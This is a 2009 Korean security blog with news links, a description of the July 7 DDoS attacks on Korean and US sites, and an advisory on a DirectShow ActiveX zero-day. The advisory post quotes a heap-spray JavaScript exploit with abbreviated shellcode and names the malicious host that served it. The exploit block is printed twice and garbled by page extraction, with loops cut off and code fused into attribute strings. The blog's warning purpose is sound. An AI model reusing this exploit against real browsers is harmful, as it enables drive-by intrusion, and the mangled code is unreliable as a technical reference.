오늘의 관심 뉴스
1. 트위터 사업계획 해킹, 한경 블로그
2. 트위터 직원들의 이메일 해킹을 통한 사업계획 해킹, CNET
- 이메일의 패스워드 recovery 및 패스워드 보안의 중요성!
3. 구글의 패스워드 강화, google online security blog
- 구글의 대응
4. 구글 보이스 해킹
5. 7.7 DDoS 공격의 물리적인 근원지는 미국, 한국일보
- 그러나 공격자 잡기는 틀린듯. ㅎㅎ 공격 시도 의도라도 파악하고 싶다. 추측만 난무...
Hi! You are a
th visitor to my blog. Please remain the messages if you want to know me more. :)
Thursday, July 16, 2009
Friday, July 10, 2009
Analysis of this DDoS BOT worm variant(09.07.09 version)
하하 이번 악성코드에 대해서 잘 분석해 주신 글이 있길래 퍼왔다.
임의 수정이나 무단 도용 없이 원문 그대로 iframe으로 붙여넣었으니 괜찮겠지?
원본 경로는 위 글 제목을 클릭하시길.
임의 수정이나 무단 도용 없이 원문 그대로 iframe으로 붙여넣었으니 괜찮겠지?
원본 경로는 위 글 제목을 클릭하시길.
Wednesday, July 8, 2009
DDoS Attacks against Korean sites, and US sites.
MS의 zero-day 취약점이 오픈되어 시끄러운지 채 하루도 지나지 않아
한국의 유명 사이트(포털, 인터넷뱅킹, 청와대, 한나라당 사이트를 비롯 정부기관, 조선일보, 옥션)는 물론이고,
미국 사이트들(백악관, US뱅크, 야후, 재무부, 나스닥... )도 다수 포함되는 DDoS 공격이 있었습니다.
공격 방법은 중국 아이피를 포함한 다수의 악성코드 유포사이트들을 접속하여
웜 바이러스를 다운로드 받아 좀비 PC가 된 다수의 PC들에서
지정된 사이트들로의 get flooding 공격을 통한 DDoS 공격이 이루어진 것으로 추정되며,
어젯밤 부터 peak로(금일 0시 가량) 현재까지도 정상적으로 웹이 열리지 않는 사이트들이 많습니다.
다수의 국내의 백신(V3, 바이로봇, 바이러스체이서, nprotect,...) 으로 현재 이 웜이 탐지가 가능하니
인터넷 사용자들은 자신의 PC 에 백신 최신 패턴 업데이트 후 full scan을 해 볼 것을 권해 드립니다.
감염된 PC 의 경우에 약 54.2KBps 정도의 부하밖에 주지 않기 때문에
PC가 느려지거나 하는 느낌이 없어 사용자가 능동적으로 백신 scanning을 하지 않는다면
DDoS 공격이 쉽게 해결되지 않을 수 있는 문제점이 있습니다.
또한 HTTP의 Get 요청 역시 정상적인 웹 접속 요청이기 때문에, 차단이 쉽지는 않을 것으로 보이며..
또한 감염된 PC에서는 src ip를 spoofing하여 UDP나 ICMP 패킷도 던지는 것으로 밝혀졌습니다.
(HTTP 92%, UDP 3%, ICMP 4% 가량)
감염 PC에서 확인한 한 웜의 경우...
Performance Analyzer라는 이름의 서비스명으로 자신을 등록하여
"C:\WINDOWS\system32\perfvwr.dll"를 등록시켰는데, 추가적인 변종 웜이 발견될 가능성이 있습니다.
Tuesday, July 7, 2009
Video ActiveX Control(MS DirectShow) Stack Overflow Vulnerability
7월 4일자로 Direct Show의 0-day 취약점에 대한 exploit이 공개되었습니다.
>> 2009.7.4 BDATuner.MPEG2TuneRequest Stack Overflow Exploit (高)
发现日期:2009-7-4
预计利用率提升几率 : 高▁▂▃▄▅▆▇
被挂马网站: 8oy4t.8866.org
挂马页: hxxp://8oy4t.8866.org/aa/go.jpg
漏洞名: BDATuner.MPEG2TuneRequest Stack Overflow Exploit
CLSID: 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF
软件: Microsoft DirectShow(msvidctl.dll)
版本: Possible all avaliable versions
article by safelab.spaces.live.com
ShellCode如下(有缩略):
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+'%u5858%u5858%u10EB%u4B5B.....%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%uADB7%u3D45%u126B%u4627%uA8EE%uD5DB%uc9c9%u87cd%u9292%ud4d0%ud1d1%ud6d1%ude93%ud0d2%uca92%u92d0%ucbce%ud5de%uced2%u93c9%uc5d8%ubdd8%ubdBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uEAEA'); // xor:0BD
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000) shuishimvp="shuishiMVP+shuishiMVP+bZmybr;" memory="new" x="0;x<300;x++)" myobject="document.createElement('object');" width="'1';" height="'1';" data="'./logo.gif';" classid="'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';">이는 윈도우즈 설치 시 기본 내장되어 있는 Microsoft Video Active X Control에 대한 취약점으로,
MS에서도 이와 관련된 Security Advisory를 7월 6일에 발표하였습니다.
http://www.microsoft.com/technet/security/advisory/972890.mspx
>> 2009.7.4 BDATuner.MPEG2TuneRequest Stack Overflow Exploit (高)
发现日期:2009-7-4
预计利用率提升几率 : 高▁▂▃▄▅▆▇
被挂马网站: 8oy4t.8866.org
挂马页: hxxp://8oy4t.8866.org/aa/go.jpg
漏洞名: BDATuner.MPEG2TuneRequest Stack Overflow Exploit
CLSID: 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF
软件: Microsoft DirectShow(msvidctl.dll)
版本: Possible all avaliable versions
article by safelab.spaces.live.com
ShellCode如下(有缩略):
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+'%u5858%u5858%u10EB%u4B5B.....%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%uADB7%u3D45%u126B%u4627%uA8EE%uD5DB%uc9c9%u87cd%u9292%ud4d0%ud1d1%ud6d1%ude93%ud0d2%uca92%u92d0%ucbce%ud5de%uced2%u93c9%uc5d8%ubdd8%ubdBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uEAEA'); // xor:0BD
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000) shuishimvp="shuishiMVP+shuishiMVP+bZmybr;" memory="new" x="0;x<300;x++)" myobject="document.createElement('object');" width="'1';" height="'1';" data="'./logo.gif';" classid="'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';">
MS에서도 이와 관련된 Security Advisory를 7월 6일에 발표하였습니다.
http://www.microsoft.com/technet/security/advisory/972890.mspx
조만간 긴급 패치가 나오겠지만, 그때까지 의심가는 웹 사이트는 절대로 방문하지 않는
사용자의 주의가 필요할 것 같습니다.
안전한 IE 사용은 아래의 사이트를 참고해 주세요.
Subscribe to:
Posts (Atom)
